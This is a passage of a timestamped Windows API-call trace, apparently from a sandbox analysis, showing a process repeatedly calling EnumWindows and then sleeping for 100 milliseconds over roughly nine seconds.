[0179.691] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.692] Sleep (dwMilliseconds=0x64) [0179.708] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.708] Sleep (dwMilliseconds=0x64) [0179.729] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.730] Sleep (dwMilliseconds=0x64) [0179.776] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.776] Sleep (dwMilliseconds=0x64) [0179.812] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.813] Sleep (dwMilliseconds=0x64) [0179.836] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.837] Sleep (dwMilliseconds=0x64) [0179.872] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.873] Sleep (dwMilliseconds=0x64) [0179.877] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.878] Sleep (dwMilliseconds=0x64) [0179.913] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.914] Sleep (dwMilliseconds=0x64) [0179.951] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.951] Sleep (dwMilliseconds=0x64) [0179.990] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0179.991] Sleep (dwMilliseconds=0x64) [0180.029] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.030] Sleep (dwMilliseconds=0x64) [0180.078] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.078] Sleep (dwMilliseconds=0x64) [0180.114] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.115] Sleep (dwMilliseconds=0x64) [0180.117] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.117] Sleep (dwMilliseconds=0x64) [0180.153] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.153] Sleep (dwMilliseconds=0x64) [0180.246] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.246] Sleep (dwMilliseconds=0x64) [0180.248] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.248] Sleep (dwMilliseconds=0x64) [0180.253] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.253] Sleep (dwMilliseconds=0x64) [0180.289] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.315] Sleep (dwMilliseconds=0x64) [0180.334] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.335] Sleep (dwMilliseconds=0x64) [0180.370] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.372] Sleep (dwMilliseconds=0x64) [0180.404] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.405] Sleep (dwMilliseconds=0x64) [0180.411] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.412] Sleep (dwMilliseconds=0x64) [0180.449] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.450] Sleep (dwMilliseconds=0x64) [0180.489] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.490] Sleep (dwMilliseconds=0x64) [0180.492] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.493] Sleep (dwMilliseconds=0x64) [0180.528] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.529] Sleep (dwMilliseconds=0x64) [0180.566] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.566] Sleep (dwMilliseconds=0x64) [0180.573] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.573] Sleep (dwMilliseconds=0x64) [0180.612] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.613] Sleep (dwMilliseconds=0x64) [0180.652] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.653] Sleep (dwMilliseconds=0x64) [0180.654] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.654] Sleep (dwMilliseconds=0x64) [0180.690] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.691] Sleep (dwMilliseconds=0x64) [0180.728] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.729] Sleep (dwMilliseconds=0x64) [0180.738] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.739] Sleep (dwMilliseconds=0x64) [0180.767] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.768] Sleep (dwMilliseconds=0x64) [0180.815] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.816] Sleep (dwMilliseconds=0x64) [0180.831] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.831] Sleep (dwMilliseconds=0x64) [0180.855] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.856] Sleep (dwMilliseconds=0x64) [0180.892] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.893] Sleep (dwMilliseconds=0x64) [0180.914] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.914] Sleep (dwMilliseconds=0x64) [0180.931] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0180.932] Sleep (dwMilliseconds=0x64) [0181.015] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.016] Sleep (dwMilliseconds=0x64) [0181.042] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.045] Sleep (dwMilliseconds=0x64) [0181.057] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.058] Sleep (dwMilliseconds=0x64) [0181.093] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.094] Sleep (dwMilliseconds=0x64) [0181.126] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.127] Sleep (dwMilliseconds=0x64) [0181.134] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.135] Sleep (dwMilliseconds=0x64) [0181.189] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.190] Sleep (dwMilliseconds=0x64) [0181.262] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.264] Sleep (dwMilliseconds=0x64) [0181.269] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.270] Sleep (dwMilliseconds=0x64) [0181.303] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.305] Sleep (dwMilliseconds=0x64) [0181.340] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.342] Sleep (dwMilliseconds=0x64) [0181.348] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.349] Sleep (dwMilliseconds=0x64) [0181.381] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.381] Sleep (dwMilliseconds=0x64) [0181.417] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.418] Sleep (dwMilliseconds=0x64) [0181.420] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.421] Sleep (dwMilliseconds=0x64) [0181.455] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.456] Sleep (dwMilliseconds=0x64) [0181.485] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.486] Sleep (dwMilliseconds=0x64) [0181.495] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.496] Sleep (dwMilliseconds=0x64) [0181.531] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.532] Sleep (dwMilliseconds=0x64) [0181.556] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.556] Sleep (dwMilliseconds=0x64) [0181.570] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.571] Sleep (dwMilliseconds=0x64) [0181.605] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.606] Sleep (dwMilliseconds=0x64) [0181.623] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.623] Sleep (dwMilliseconds=0x64) [0181.633] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.634] Sleep (dwMilliseconds=0x64) [0181.652] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.655] Sleep (dwMilliseconds=0x64) [0181.692] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.692] Sleep (dwMilliseconds=0x64) [0181.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.707] Sleep (dwMilliseconds=0x64) [0181.730] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.731] Sleep (dwMilliseconds=0x64) [0181.767] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.768] Sleep (dwMilliseconds=0x64) [0181.802] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.803] Sleep (dwMilliseconds=0x64) [0181.820] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.821] Sleep (dwMilliseconds=0x64) [0181.858] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.858] Sleep (dwMilliseconds=0x64) [0181.891] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.892] Sleep (dwMilliseconds=0x64) [0181.900] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.901] Sleep (dwMilliseconds=0x64) [0181.937] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.938] Sleep (dwMilliseconds=0x64) [0181.975] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.976] Sleep (dwMilliseconds=0x64) [0181.982] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0181.983] Sleep (dwMilliseconds=0x64) [0182.016] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.017] Sleep (dwMilliseconds=0x64) [0182.053] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.054] Sleep (dwMilliseconds=0x64) [0182.067] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.068] Sleep (dwMilliseconds=0x64) [0182.093] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.094] Sleep (dwMilliseconds=0x64) [0182.130] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.131] Sleep (dwMilliseconds=0x64) [0182.152] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.153] Sleep (dwMilliseconds=0x64) [0182.202] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.204] Sleep (dwMilliseconds=0x64) [0182.251] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.251] Sleep (dwMilliseconds=0x64) [0182.278] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.279] Sleep (dwMilliseconds=0x64) [0182.289] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.290] Sleep (dwMilliseconds=0x64) [0182.326] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.326] Sleep (dwMilliseconds=0x64) [0182.349] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.349] Sleep (dwMilliseconds=0x64) [0182.364] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.366] Sleep (dwMilliseconds=0x64) [0182.403] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.404] Sleep (dwMilliseconds=0x64) [0182.440] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.440] Sleep (dwMilliseconds=0x64) [0182.442] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.442] Sleep (dwMilliseconds=0x64) [0182.478] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.479] Sleep (dwMilliseconds=0x64) [0182.516] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.517] Sleep (dwMilliseconds=0x64) [0182.526] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.527] Sleep (dwMilliseconds=0x64) [0182.554] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.554] Sleep (dwMilliseconds=0x64) [0182.592] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.593] Sleep (dwMilliseconds=0x64) [0182.623] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.624] Sleep (dwMilliseconds=0x64) [0182.634] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.635] Sleep (dwMilliseconds=0x64) [0182.671] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.672] Sleep (dwMilliseconds=0x64) [0182.707] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.710] Sleep (dwMilliseconds=0x64) [0182.715] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.716] Sleep (dwMilliseconds=0x64) [0182.749] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.749] Sleep (dwMilliseconds=0x64) [0182.797] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.798] Sleep (dwMilliseconds=0x64) [0182.814] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.815] Sleep (dwMilliseconds=0x64) [0182.836] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.837] Sleep (dwMilliseconds=0x64) [0182.872] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.873] Sleep (dwMilliseconds=0x64) [0182.902] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.903] Sleep (dwMilliseconds=0x64) [0182.912] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.913] Sleep (dwMilliseconds=0x64) [0182.966] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0182.967] Sleep (dwMilliseconds=0x64) [0183.007] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.008] Sleep (dwMilliseconds=0x64) [0183.015] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.016] Sleep (dwMilliseconds=0x64) [0183.048] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.049] Sleep (dwMilliseconds=0x64) [0183.089] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.090] Sleep (dwMilliseconds=0x64) [0183.111] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.112] Sleep (dwMilliseconds=0x64) [0183.132] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.133] Sleep (dwMilliseconds=0x64) [0183.215] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.216] Sleep (dwMilliseconds=0x64) [0183.251] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.252] Sleep (dwMilliseconds=0x64) [0183.261] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.262] Sleep (dwMilliseconds=0x64) [0183.299] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.301] Sleep (dwMilliseconds=0x64) [0183.340] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.342] Sleep (dwMilliseconds=0x64) [0183.345] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.346] Sleep (dwMilliseconds=0x64) [0183.482] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.483] Sleep (dwMilliseconds=0x64) [0183.521] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.522] Sleep (dwMilliseconds=0x64) [0183.527] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.528] Sleep (dwMilliseconds=0x64) [0183.558] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.559] Sleep (dwMilliseconds=0x64) [0183.596] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.596] Sleep (dwMilliseconds=0x64) [0183.598] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.598] Sleep (dwMilliseconds=0x64) [0183.600] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.601] Sleep (dwMilliseconds=0x64) [0183.637] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.638] Sleep (dwMilliseconds=0x64) [0183.676] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.677] Sleep (dwMilliseconds=0x64) [0183.679] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.680] Sleep (dwMilliseconds=0x64) [0183.715] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.716] Sleep (dwMilliseconds=0x64) [0183.751] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.752] Sleep (dwMilliseconds=0x64) [0183.753] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.754] Sleep (dwMilliseconds=0x64) [0183.804] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.805] Sleep (dwMilliseconds=0x64) [0183.845] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.846] Sleep (dwMilliseconds=0x64) [0183.885] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.886] Sleep (dwMilliseconds=0x64) [0183.921] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.921] Sleep (dwMilliseconds=0x64) [0183.923] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0183.924] Sleep (dwMilliseconds=0x64) [0183.963] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.000] Sleep (dwMilliseconds=0x64) [0184.002] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.003] Sleep (dwMilliseconds=0x64) [0184.038] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.039] Sleep (dwMilliseconds=0x64) [0184.075] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.075] Sleep (dwMilliseconds=0x64) [0184.092] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.092] Sleep (dwMilliseconds=0x64) [0184.129] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.130] Sleep (dwMilliseconds=0x64) [0184.188] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.189] Sleep (dwMilliseconds=0x64) [0184.199] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.200] Sleep (dwMilliseconds=0x64) [0184.236] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.237] Sleep (dwMilliseconds=0x64) [0184.277] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.278] Sleep (dwMilliseconds=0x64) [0184.297] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.298] Sleep (dwMilliseconds=0x64) [0184.318] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.319] Sleep (dwMilliseconds=0x64) [0184.354] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.355] Sleep (dwMilliseconds=0x64) [0184.383] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.384] Sleep (dwMilliseconds=0x64) [0184.398] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.398] Sleep (dwMilliseconds=0x64) [0184.440] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.441] Sleep (dwMilliseconds=0x64) [0184.467] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.467] Sleep (dwMilliseconds=0x64) [0184.482] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.483] Sleep (dwMilliseconds=0x64) [0184.532] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.535] Sleep (dwMilliseconds=0x64) [0184.621] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.622] Sleep (dwMilliseconds=0x64) [0184.625] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.625] Sleep (dwMilliseconds=0x64) [0184.661] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.662] Sleep (dwMilliseconds=0x64) [0184.702] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.703] Sleep (dwMilliseconds=0x64) [0184.718] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.719] Sleep (dwMilliseconds=0x64) [0184.742] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.744] Sleep (dwMilliseconds=0x64) [0184.780] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.781] Sleep (dwMilliseconds=0x64) [0184.818] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.819] Sleep (dwMilliseconds=0x64) [0184.831] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.832] Sleep (dwMilliseconds=0x64) [0184.869] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.870] Sleep (dwMilliseconds=0x64) [0184.917] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.918] Sleep (dwMilliseconds=0x64) [0184.922] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.923] Sleep (dwMilliseconds=0x64) [0184.968] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0184.970] Sleep (dwMilliseconds=0x64) [0185.014] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0185.015] Sleep (dwMilliseconds=0x64) [0185.053] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0185.054] Sleep (dwMilliseconds=0x64) [0185.061] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0185.061] Sleep (dwMilliseconds=0x64) [0185.100] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0185.101] Sleep (dwMilliseconds=0x64) [0185.138] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0185.138] Sleep (dwMilliseconds=0x64) [0185.251] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0185.252] Sleep (dwMilliseconds=0x64) [0186.179] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0186.180] Sleep (dwMilliseconds=0x64) [0186.290] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0186.292] Sleep (dwMilliseconds=0x64) [0186.414] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0186.415] Sleep (dwMilliseconds=0x64) [0186.493] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0186.494] Sleep (dwMilliseconds=0x64) [0186.536] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0186.537] Sleep (dwMilliseconds=0x64) [0186.571] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0186.572] Sleep (dwMilliseconds=0x64) [0186.620] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0186.621] Sleep (dwMilliseconds=0x64) [0186.685] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0186.686] Sleep (dwMilliseconds=0x64) [0186.715] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0186.716] Sleep (dwMilliseconds=0x64) [0186.747] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0186.748] Sleep (dwMilliseconds=0x64) [0186.786] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0186.787] Sleep (dwMilliseconds=0x64) [0186.808] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0186.809] Sleep (dwMilliseconds=0x64) [0186.862] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0186.894] Sleep (dwMilliseconds=0x64) [0186.945] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0186.946] Sleep (dwMilliseconds=0x64) [0187.002] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.003] Sleep (dwMilliseconds=0x64) [0187.050] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.051] Sleep (dwMilliseconds=0x64) [0187.113] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.113] Sleep (dwMilliseconds=0x64) [0187.156] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.157] Sleep (dwMilliseconds=0x64) [0187.176] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.177] Sleep (dwMilliseconds=0x64) [0187.247] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.249] Sleep (dwMilliseconds=0x64) [0187.328] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.329] Sleep (dwMilliseconds=0x64) [0187.369] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.370] Sleep (dwMilliseconds=0x64) [0187.396] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.397] Sleep (dwMilliseconds=0x64) [0187.438] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.439] Sleep (dwMilliseconds=0x64) [0187.441] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.442] Sleep (dwMilliseconds=0x64) [0187.480] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.481] Sleep (dwMilliseconds=0x64) [0187.485] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.485] Sleep (dwMilliseconds=0x64) [0187.521] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.522] Sleep (dwMilliseconds=0x64) [0187.561] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.562] Sleep (dwMilliseconds=0x64) [0187.564] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.565] Sleep (dwMilliseconds=0x64) [0187.601] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.602] Sleep (dwMilliseconds=0x64) [0187.682] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.683] Sleep (dwMilliseconds=0x64) [0187.689] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.689] Sleep (dwMilliseconds=0x64) [0187.725] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.726] Sleep (dwMilliseconds=0x64) [0187.767] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.768] Sleep (dwMilliseconds=0x64) [0187.793] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.793] Sleep (dwMilliseconds=0x64) [0187.807] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.808] Sleep (dwMilliseconds=0x64) [0187.844] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.845] Sleep (dwMilliseconds=0x64) [0187.908] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.909] Sleep (dwMilliseconds=0x64) [0187.916] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.918] Sleep (dwMilliseconds=0x64) [0187.956] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.957] Sleep (dwMilliseconds=0x64) [0187.997] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0187.998] Sleep (dwMilliseconds=0x64) [0188.007] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.008] Sleep (dwMilliseconds=0x64) [0188.045] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.046] Sleep (dwMilliseconds=0x64) [0188.093] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.095] Sleep (dwMilliseconds=0x64) [0188.124] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.125] Sleep (dwMilliseconds=0x64) [0188.141] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.142] Sleep (dwMilliseconds=0x64) [0188.182] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.183] Sleep (dwMilliseconds=0x64) [0188.234] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.235] Sleep (dwMilliseconds=0x64) [0188.237] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.237] Sleep (dwMilliseconds=0x64) [0188.273] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.274] Sleep (dwMilliseconds=0x64) [0188.311] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.312] Sleep (dwMilliseconds=0x64) [0188.319] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.320] Sleep (dwMilliseconds=0x64) [0188.353] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.354] Sleep (dwMilliseconds=0x64) [0188.519] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.520] Sleep (dwMilliseconds=0x64) [0188.541] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.542] Sleep (dwMilliseconds=0x64) [0188.560] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.561] Sleep (dwMilliseconds=0x64) [0188.598] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.598] Sleep (dwMilliseconds=0x64) [0188.647] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.649] Sleep (dwMilliseconds=0x64) [0188.657] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0188.657] Sleep 